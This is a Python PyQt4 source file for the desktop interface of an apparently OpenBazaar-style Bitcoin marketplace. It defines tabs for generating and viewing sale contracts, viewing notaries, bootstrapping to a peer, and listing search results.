self.setAutoFillBackground(False)
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 10, 671, 235))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("store_details_label"))
self.gridLayout.addWidget(self.label, 1, 0, 1, 1)
self.bitcoin_address_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.bitcoin_address_lineEdit.setObjectName(_fromUtf8("bitcoin_lineEdit"))
self.gridLayout.addWidget(self.bitcoin_address_lineEdit, 3, 1, 1, 1)
self.label_7 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_7.setFont(font)
self.label_7.setObjectName(_fromUtf8("nickname_label"))
self.gridLayout.addWidget(self.label_7, 6, 0, 1, 1)
self.price_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.price_lineEdit.setObjectName(_fromUtf8("guid_lineEdit"))
self.gridLayout.addWidget(self.price_lineEdit, 5, 1, 1, 1)
self.expiry_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.expiry_lineEdit.setObjectName(_fromUtf8("email_lineEdit"))
self.gridLayout.addWidget(self.expiry_lineEdit, 6, 1, 1, 1)
self.item_name_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.item_name_lineEdit.setObjectName(_fromUtf8("add_notary_line"))
self.gridLayout.addWidget(self.item_name_lineEdit, 4, 1, 1, 1)
self.label_6 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_6.setFont(font)
self.label_6.setObjectName(_fromUtf8("trusted_notaries_label"))
self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1)
self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_4.setFont(font)
self.label_4.setObjectName(_fromUtf8("notary_details_label"))
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_5.setFont(font)
self.label_5.setObjectName(_fromUtf8("shipping_label"))
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setLayoutDirection(QtCore.Qt.RightToLeft)
self.label_2.setAutoFillBackground(False)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName(_fromUtf8("keys_label"))
self.gridLayout.addWidget(self.label_2, 2, 1, 1, 1)
self.generate_contract_button = QtGui.QPushButton(self)
self.generate_contract_button.setGeometry(QtCore.QRect(520, 260, 161, 27))
self.generate_contract_button.setObjectName(_fromUtf8("add_notary_label"))
##
# Add keywords
self.keywords_label = QtGui.QLabel(self.gridLayoutWidget)
self.keywords_label.setText("Add keywords")
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.keywords_label.setFont(font)
self.keywords_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.keywords_lineEdit.setText("Separate keywords by comma (ie word1,word2,word3,...,wordn)")
self.gridLayout.addWidget(self.keywords_label)
self.gridLayout.addWidget(self.keywords_lineEdit)
##
# Add pictures
self.browse_images_label = QtGui.QLabel(self.gridLayoutWidget)
self.browse_images_label.setText("Add images (max 3):")
self.browse_images_label.setFont(font)
self.images_button = QtGui.QPushButton(self.gridLayoutWidget)
self.images_button.setText("Browse...")
self.gridLayout.addWidget(self.browse_images_label)
self.gridLayout.addWidget(self.images_button)
self.images = list()
##
# Add a description
self.description_label = QtGui.QLabel(self.gridLayoutWidget)
self.description_label.setText("Item Description:")
self.description_label.setFont(font)
self.gridLayout.addWidget(self.description_label)
self.description_box = QtGui.QLineEdit(self.gridLayoutWidget)
self.gridLayout.addWidget(self.description_box)
##
# On clicked, generate the new contract data
# On clicked, find pictures
self.generate_contract_button.clicked.connect(self.generate_from_input)
self.images_button.clicked.connect(self.find_images)
self.label.setText(_translate("Form", "Contract Generator", None))
self.label_7.setText(_translate("Form", "Offer expiry date", None))
self.label_6.setText(_translate("Form", "Price (in BTC) of item to sell", None))
self.label_4.setText(_translate("Form", "Your Bitcoin address", None))
self.label_5.setText(_translate("Form", "Name of item to sell", None))
self.label_2.setText(_translate("Form", "Contract", None))
self.generate_contract_button.setText(_translate("Form", "Generate Contract", None))
##
# Creates a new contract using the fields in the UI
def generate_from_input(self):
contract = dict()
contract['expiry'] = str(self.expiry_lineEdit.text())
contract['price'] = str(self.price_lineEdit.text())
contract['bitcoin_address'] = str(self.bitcoin_address_lineEdit.text())
contract['item_name'] = str(self.item_name_lineEdit.text())
contract['keywords'] = str(self.keywords_lineEdit.text().split(','))
contract['description'] = str(self.description_box.text())
contract['images'] = self.images
self.window().id_module.new_contract(contract)
self.window().redraw()
##
# Browse and add images
# Saves the first three selected image paths to self.images (list)
def find_images(self):
self.images = QtGui.QFileDialog.getOpenFileNames(self, 'Add Images', '', '')[0:3]
if len(self.images) != 0:
self.images_button.setText(str(len(self.images)) + " selected")
else:
self.images_button.setText("Browse...")
##
# This class holds the UI for the Contract View Tab
class contractView_Tab(QtGui.QWidget):
##
# Constructor
# Creates the contract view tab
# @param ricardian_contract: ricardian contract being viewed in the tab
def __init__(self, ricardian_contract):
super(contractView_Tab, self).__init__()
self.contract_obj = ricardian_contract
self.setObjectName(_fromUtf8("Form"))
self.resize(1199, 1250)
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 570, 801, 231))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.descriptionTextBrowser = QtGui.QTextBrowser(self.gridLayoutWidget)
self.descriptionTextBrowser.setObjectName(_fromUtf8("descriptionTextBrowser"))
self.gridLayout.addWidget(self.descriptionTextBrowser, 0, 0, 1, 1)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 161, 181))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.label_2 = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout.addWidget(self.label_2)
self.label_3 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.verticalLayout.addWidget(self.label_3)
self.label_4 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.verticalLayout.addWidget(self.label_4)
self.verticalLayoutWidget_3 = QtGui.QWidget(self)
self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(160, 0, 641, 181))
self.verticalLayoutWidget_3.setObjectName(_fromUtf8("verticalLayoutWidget_3"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.verticalLayoutWidget_3)
self.verticalLayout_3.setMargin(0)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.itemName = QtGui.QLabel(self.verticalLayoutWidget_3)
font = QtGui.QFont()
font.setPointSize(22)
self.itemName.setFont(font)
self.itemName.setText(_fromUtf8(""))
self.itemName.setObjectName(_fromUtf8("itemName"))
self.verticalLayout_3.addWidget(self.itemName)
self.price = QtGui.QLabel(self.verticalLayoutWidget_3)
font = QtGui.QFont()
font.setPointSize(18)
self.price.setFont(font)
self.price.setText(_fromUtf8(""))
self.price.setObjectName(_fromUtf8("price"))
self.verticalLayout_3.addWidget(self.price)
self.dateUploaded = QtGui.QLabel(self.verticalLayoutWidget_3)
self.dateUploaded.setText(_fromUtf8(""))
self.dateUploaded.setObjectName(_fromUtf8("dateUploaded"))
self.verticalLayout_3.addWidget(self.dateUploaded)
self.expires = QtGui.QLabel(self.verticalLayoutWidget_3)
self.expires.setText(_fromUtf8(""))
self.expires.setObjectName(_fromUtf8("expires"))
self.verticalLayout_3.addWidget(self.expires)
self.label_6 = QtGui.QLabel(self)
self.label_6.setGeometry(QtCore.QRect(0, 540, 91, 17))
self.label_6.setObjectName(_fromUtf8("label_6"))
self.horizontalLayoutWidget = QtGui.QWidget(self)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(0, 850, 801, 271))
self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
self.horizontalLayout = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout.setMargin(0)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.pictureOne = QtGui.QLabel(self.horizontalLayoutWidget)
self.pictureOne.setText(_fromUtf8(""))
self.pictureOne.setObjectName(_fromUtf8("pictureOne"))
self.horizontalLayout.addWidget(self.pictureOne)
self.pictureTwo = QtGui.QLabel(self.horizontalLayoutWidget)
self.pictureTwo.setText(_fromUtf8(""))
self.pictureTwo.setObjectName(_fromUtf8("pictureTwo"))
self.horizontalLayout.addWidget(self.pictureTwo)
self.pictureThree = QtGui.QLabel(self.horizontalLayoutWidget)
self.pictureThree.setText(_fromUtf8(""))
self.pictureThree.setObjectName(_fromUtf8("pictureThree"))
self.horizontalLayout.addWidget(self.pictureThree)
self.label_7 = QtGui.QLabel(self)
self.label_7.setGeometry(QtCore.QRect(0, 820, 66, 17))
self.label_7.setObjectName(_fromUtf8("label_7"))
self.label_8 = QtGui.QLabel(self)
self.label_8.setGeometry(QtCore.QRect(40, 1210, 121, 17))
self.label_8.setObjectName(_fromUtf8("label_8"))
self.desiredQuantitySpinBox = QtGui.QSpinBox(self)
self.desiredQuantitySpinBox.setGeometry(QtCore.QRect(170, 1200, 71, 31))
self.desiredQuantitySpinBox.setObjectName(_fromUtf8("desiredQuantitySpinBox"))
self.label_9 = QtGui.QLabel(self)
self.label_9.setGeometry(QtCore.QRect(250, 1210, 131, 17))
self.label_9.setObjectName(_fromUtf8("label_9"))
self.noteForMerchantLineEdit = QtGui.QLineEdit(self)
self.noteForMerchantLineEdit.setGeometry(QtCore.QRect(400, 1210, 321, 27))
self.noteForMerchantLineEdit.setObjectName(_fromUtf8("noteForMerchantLineEdit"))
self.purchaseButton = QtGui.QPushButton(self)
self.purchaseButton.setGeometry(QtCore.QRect(730, 1210, 98, 27))
self.purchaseButton.setObjectName(_fromUtf8("purchaseButton"))
self.sellerAvatar = QtGui.QLabel(self)
self.sellerAvatar.setGeometry(QtCore.QRect(990, 10, 201, 181))
self.sellerAvatar.setText(_fromUtf8(""))
self.sellerAvatar.setObjectName(_fromUtf8("sellerAvatar"))
self.label_15 = QtGui.QLabel(self)
self.label_15.setGeometry(QtCore.QRect(310, 1170, 81, 17))
self.label_15.setObjectName(_fromUtf8("label_15"))
self.keywords = QtGui.QLineEdit(self)
self.keywords.setGeometry(QtCore.QRect(400, 1170, 321, 27))
self.keywords.setObjectName(_fromUtf8("keywords"))
self.gridLayoutWidget_2 = QtGui.QWidget(self)
self.gridLayoutWidget_2.setGeometry(QtCore.QRect(0, 190, 801, 322))
self.gridLayoutWidget_2.setObjectName(_fromUtf8("gridLayoutWidget_2"))
self.gridLayout_2 = QtGui.QGridLayout(self.gridLayoutWidget_2)
self.gridLayout_2.setMargin(0)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.sellerName = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(22)
self.sellerName.setFont(font)
self.sellerName.setText(_fromUtf8(""))
self.sellerName.setObjectName(_fromUtf8("sellerName"))
self.gridLayout_2.addWidget(self.sellerName, 0, 1, 1, 1)
self.bitcoinReceivingAddress = QtGui.QTextBrowser(self.gridLayoutWidget_2)
self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
self.gridLayout_2.addWidget(self.bitcoinReceivingAddress, 3, 1, 1, 1)
self.guid = QtGui.QTextBrowser(self.gridLayoutWidget_2)
self.guid.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.guid.setObjectName(_fromUtf8("guid"))
self.gridLayout_2.addWidget(self.guid, 2, 1, 1, 1)
self.sellerEmail = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(18)
self.sellerEmail.setFont(font)
self.sellerEmail.setText(_fromUtf8(""))
self.sellerEmail.setObjectName(_fromUtf8("sellerEmail"))
self.gridLayout_2.addWidget(self.sellerEmail, 1, 1, 1, 1)
self.label_13 = QtGui.QLabel(self.gridLayoutWidget_2)
self.label_13.setObjectName(_fromUtf8("label_13"))
self.gridLayout_2.addWidget(self.label_13, 2, 0, 1, 1)
self.publicKey = QtGui.QTextBrowser(self.gridLayoutWidget_2)
self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.publicKey.setObjectName(_fromUtf8("publicKey"))
self.gridLayout_2.addWidget(self.publicKey, 4, 1, 1, 1)
self.label_11 = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(18)
self.label_11.setFont(font)
self.label_11.setObjectName(_fromUtf8("label_11"))
self.gridLayout_2.addWidget(self.label_11, 1, 0, 1, 1)
self.label_10 = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(22)
self.label_10.setFont(font)
self.label_10.setObjectName(_fromUtf8("label_10"))
self.gridLayout_2.addWidget(self.label_10, 0, 0, 1, 1)
self.label_12 = QtGui.QLabel(self.gridLayoutWidget_2)
self.label_12.setObjectName(_fromUtf8("label_12"))
self.gridLayout_2.addWidget(self.label_12, 3, 0, 1, 1)
self.label_14 = QtGui.QLabel(self.gridLayoutWidget_2)
self.label_14.setObjectName(_fromUtf8("label_14"))
self.gridLayout_2.addWidget(self.label_14, 4, 0, 1, 1)
self.label_5 = QtGui.QLabel(self)
self.label_5.setGeometry(QtCore.QRect(330, 1130, 66, 17))
self.label_5.setObjectName(_fromUtf8("label_5"))
self.ledger = QtGui.QLineEdit(self)
self.ledger.setGeometry(QtCore.QRect(400, 1130, 321, 27))
self.ledger.setObjectName(_fromUtf8("ledger"))
self.label.setText(_translate("Form", "Item Name:", None))
self.label_2.setText(_translate("Form", "Price:", None))
self.label_3.setText(_translate("Form", "Date Uploaded:", None))
self.label_4.setText(_translate("Form", "Expires:", None))
self.label_6.setText(_translate("Form", "Description: ", None))
self.label_7.setText(_translate("Form", "Pictures:", None))
self.label_8.setText(_translate("Form", "Desired Quantity:", None))
self.label_9.setText(_translate("Form", "Note for Merchant:", None))
self.purchaseButton.setText(_translate("Form", "Purchase", None))
self.label_15.setText(_translate("Form", "Keywords:", None))
self.bitcoinReceivingAddress.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsdddddddddddddddddddddddddddddddddddddddddddddddddasdfasdfasdfasdfasdfasdfasdffdasdf</p></body></html>", None))
self.guid.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsddddddddddddddddddddddddddddddddddddddddddddddddd</p></body></html>", None))
self.label_13.setText(_translate("Form", "GUID:", None))
self.publicKey.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsddddddddddddddddddddddddddddddddddddddddddddddddd</p></body></html>", None))
self.label_11.setText(_translate("Form", "Seller Email:", None))
self.label_10.setText(_translate("Form", "Seller Name:", None))
self.label_12.setText(_translate("Form", "Bitcoin Receiving Address:", None))
self.label_14.setText(_translate("Form", "Public Key:", None))
self.label_5.setText(_translate("Form", "Ledger:", None))
meta = ricardian_contract.get_module('metadata')
id = ricardian_contract.get_module('id')
trade = ricardian_contract.get_module('trade')
ledger = ricardian_contract.get_module('ledger')
##
# Set values from the trade module
self.itemName.setText(trade['name'])
self.price.setText(trade['price'])
self.descriptionTextBrowser.setText(trade['description'])
self.keywords.setText(', '.join(trade['keywords']))
for count, image_store in enumerate(trade['images']):
if count == 0:
self.pictureOne.setPixmap(image_store.get_repr().toqpixmap())
self.pictureOne.setScaledContents(True)
elif count == 1:
self.pictureTwo.setPixmap(image_store.get_repr().toqpixmap())
self.pictureTwo.setScaledContents(True)
elif count == 2:
self.pictureThree.setPixmap(image_store.get_repr().toqpixmap())
self.pictureThree.setScaledContents(True)
##
# Set values from the metadata module
self.dateUploaded.setText(meta['date'])
self.expires.setText(meta['expiry'])
##
# Set values from the seller module
#self.bitcoinRecevingAddress.setText(id['seller']['bitcoinReceivingAddress'])
self.sellerName.setText(id['seller']['nickname'])
self.sellerEmail.setText(id['seller']['email'])
self.guid.setText(id['seller']['guid'])
self.publicKey.setText(id['seller']['pubkey'])
avatar_pm = id['seller']['avatar'].get_repr().toqpixmap()
self.sellerAvatar.setPixmap(avatar_pm)
self.sellerAvatar.setScaledContents(True)
self.purchaseButton.clicked.connect(self.purchase_contract)
##
# Defines action to be taken when purchaseButton is clicked
def purchase_contract(self):
self.window().id_module.make_purchase(self.contract_obj)
self.window().redraw()
##
# This class holds the view for a notary
class notaryViewTab(QtGui.QWidget):
##
# Constructor
# Creates the Notary View Tab
def __init__(self, notary_repr_obj):
super(notaryViewTab, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(941, 527)
self.label_11 = QtGui.QLabel(self)
self.label_11.setGeometry(QtCore.QRect(540, 6, 231, 211))
self.label_11.setText(_fromUtf8(""))
self.label_11.setObjectName(_fromUtf8("label_11"))
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 10, 771, 452))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.GUID = QtGui.QTextEdit(self.gridLayoutWidget)
self.GUID.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.GUID.setObjectName(_fromUtf8("GUID"))
self.gridLayout.addWidget(self.GUID, 2, 1, 1, 1)
self.publicKey = QtGui.QTextEdit(self.gridLayoutWidget)
self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.publicKey.setObjectName(_fromUtf8("publicKey"))
self.gridLayout.addWidget(self.publicKey, 3, 1, 1, 1)
self.bitcoinReceivingAddress = QtGui.QTextEdit(self.gridLayoutWidget)
self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
self.gridLayout.addWidget(self.bitcoinReceivingAddress, 4, 1, 1, 1)
self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
self.label_7 = QtGui.QLabel(self.gridLayoutWidget)
self.label_7.setObjectName(_fromUtf8("label_7"))
self.gridLayout.addWidget(self.label_7, 5, 0, 1, 1)
self.storeEmail = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.storeEmail.setFont(font)
self.storeEmail.setText(_fromUtf8(""))
self.storeEmail.setObjectName(_fromUtf8("storeEmail"))
self.gridLayout.addWidget(self.storeEmail, 1, 1, 1, 1)
self.storeName = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.storeName.setFont(font)
self.storeName.setText(_fromUtf8(""))
self.storeName.setObjectName(_fromUtf8("storeName"))
self.gridLayout.addWidget(self.storeName, 0, 1, 1, 1)
self.label = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.label_3 = QtGui.QLabel(self.gridLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.fee = QtGui.QLabel(self.gridLayoutWidget)
self.fee.setText(_fromUtf8(""))
self.fee.setObjectName(_fromUtf8("fee"))
self.gridLayout.addWidget(self.fee, 5, 1, 1, 1)
self.label_9 = QtGui.QLabel(self.gridLayoutWidget)
self.label_9.setObjectName(_fromUtf8("label_9"))
self.gridLayout.addWidget(self.label_9, 6, 0, 1, 1)
self.description = QtGui.QTextEdit(self.gridLayoutWidget)
self.description.setObjectName(_fromUtf8("description"))
self.gridLayout.addWidget(self.description, 6, 1, 1, 1)
self.label_8 = QtGui.QLabel(self)
self.label_8.setGeometry(QtCore.QRect(800, 20, 221, 211))
self.label_8.setText(_fromUtf8(""))
self.label_8.setObjectName(_fromUtf8("label_8"))
self.avatar = QtGui.QLabel(self)
self.avatar.setGeometry(QtCore.QRect(780, 20, 151, 141))
self.avatar.setText(_fromUtf8(""))
self.avatar.setObjectName(_fromUtf8("avatar"))
self.setWindowTitle(_translate("Form", "Form", None))
self.GUID.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfasdfasdfasdfasdfasdfasdfasdfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffasddfasdasdfasdfasdfasdffasdf</p></body></html>", None))
self.publicKey.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdasdfadfasdfasdfasdfasdfasdfasdffsdsdfffffffffffffffffffffffasdasdfasdfasdfasdfasdfasdfasdfasdasdf</p></body></html>", None))
self.bitcoinReceivingAddress.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfadsfadfasdfasdfasdfasfasdfasfdfsdadsfsdfdfsafdsadfsdfsadsfdafsadfsdasdasdfadsfasdfasdfasdfasdassadfasdfasdfasdfasdfasfdasdfdsaf</p></body></html>", None))
self.label_4.setText(_translate("Form", "Public Key:", None))
self.label_7.setText(_translate("Form", "Fee (%):", None))
self.label.setText(_translate("Form", "User Name:", None))
self.label_3.setText(_translate("Form", "GUID:", None))
self.label_5.setText(_translate("Form", "Bitcoin Receiving Address:", None))
self.label_2.setText(_translate("Form", "User Email:", None))
self.label_9.setText(_translate("Form", "Description", None))
notary_repr = notary_repr_obj.get()
self.bitcoinReceivingAddress.setText(notary_repr['bitcoinReceivingAddress'])
self.avatar.setPixmap(notary_repr['avatar'].get_repr().toqpixmap())
self.avatar.setScaledContents(True)
self.description.setText(notary_repr['description'])
self.fee.setText(notary_repr['fee'])
self.GUID.setText(notary_repr['guid'])
self.storeEmail.setText(notary_repr['email'])
self.publicKey.setText(notary_repr['pubkey'])
self.storeName.setText(notary_repr['name'])
##
# bootStrap_Tab
# This class holds the UI for the bootstrap tab
class bootStrap_Tab(QtGui.QWidget):
##
# Constructor
# Creates the bootstrap tab
def __init__(self):
super(bootStrap_Tab, self).__init__()
self.setObjectName(_fromUtf8("OrdersMenu"))
self.resize(400, 300)
self.pushButton = QtGui.QPushButton(self)
self.pushButton.setGeometry(QtCore.QRect(70, 180, 98, 27))
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.ip_lineEdit = QtGui.QLineEdit(self)
self.ip_lineEdit.setGeometry(QtCore.QRect(50, 70, 161, 27))
self.ip_lineEdit.setObjectName(_fromUtf8("ip_lineEdit"))
self.port_lineEdit = QtGui.QLineEdit(self)
self.port_lineEdit.setGeometry(QtCore.QRect(50, 120, 161, 27))
self.port_lineEdit.setObjectName(_fromUtf8("port_lineEdit"))
self.setWindowTitle(_translate("OrdersMenu", "Form", None))
self.pushButton.setText(_translate("OrdersMenu", "Bootstrap", None))
self.ip_lineEdit.setText(_translate("OrdersMenu", "Enter IP Address", None))
self.port_lineEdit.setText(_translate("OrdersMenu", "Enter Port Number", None))
##
# On clicked, generate the bootstrap
self.pushButton.clicked.connect(self.initiate_bootstrap)
##
# Attempts to bootstrap the node module to the network using the fields in the tab
def initiate_bootstrap(self):
self.window().node.attempt_bootstrap(str(self.ip_lineEdit.text()), int(self.port_lineEdit.text()))
##
# This class is a view for the results of an OpenBazaar search
class SearchResultsWidget(QtGui.QWidget):
def __init__(self, search, list_of_contracts):
super(SearchResultsWidget, self).__init__()
##
# Save the list of contracts, so when one is selected we can draw the contract
# view using it's data
self.contracts_found = list_of_contracts
self.setObjectName(_fromUtf8("search_results_widget"))
self.resize(748, 568)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 751, 571))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.search_results_label = QtGui.QLabel(self.verticalLayoutWidget)
self.search_query_label = QtGui.QLabel(self.verticalLayoutWidget)
header_font = QtGui.QFont()
header_font.setFamily(_fromUtf8("Latin Modern Sans"))
header_font.setPointSize(36)
self.search_query_label.setFont(header_font)
header_font.setUnderline(True)
self.search_results_label.setFont(header_font)
self.search_results_label.setObjectName(_fromUtf8("search_results_label"))
self.verticalLayout.addWidget(self.search_results_label)
self.verticalLayout.addWidget(self.search_query_label)
self.results_list = QtGui.QListWidget(self.verticalLayoutWidget)
self.results_list.setObjectName(_fromUtf8("results_list"))
##
# Add all search results to the list
#
item_font = QtGui.QFont()
item_font.setPointSize(16)
for contract in self.contracts_found:
item = QtGui.QListWidgetItem()
item.setFont(item_font)
item.setText(contract.get_itemname())
item.setData(QtCore.Qt.UserRole, contract)
self.results_list.addItem(item)
self.results_list.itemClicked.connect(self.result_clicked)
self.verticalLayout.addWidget(self.results_list)
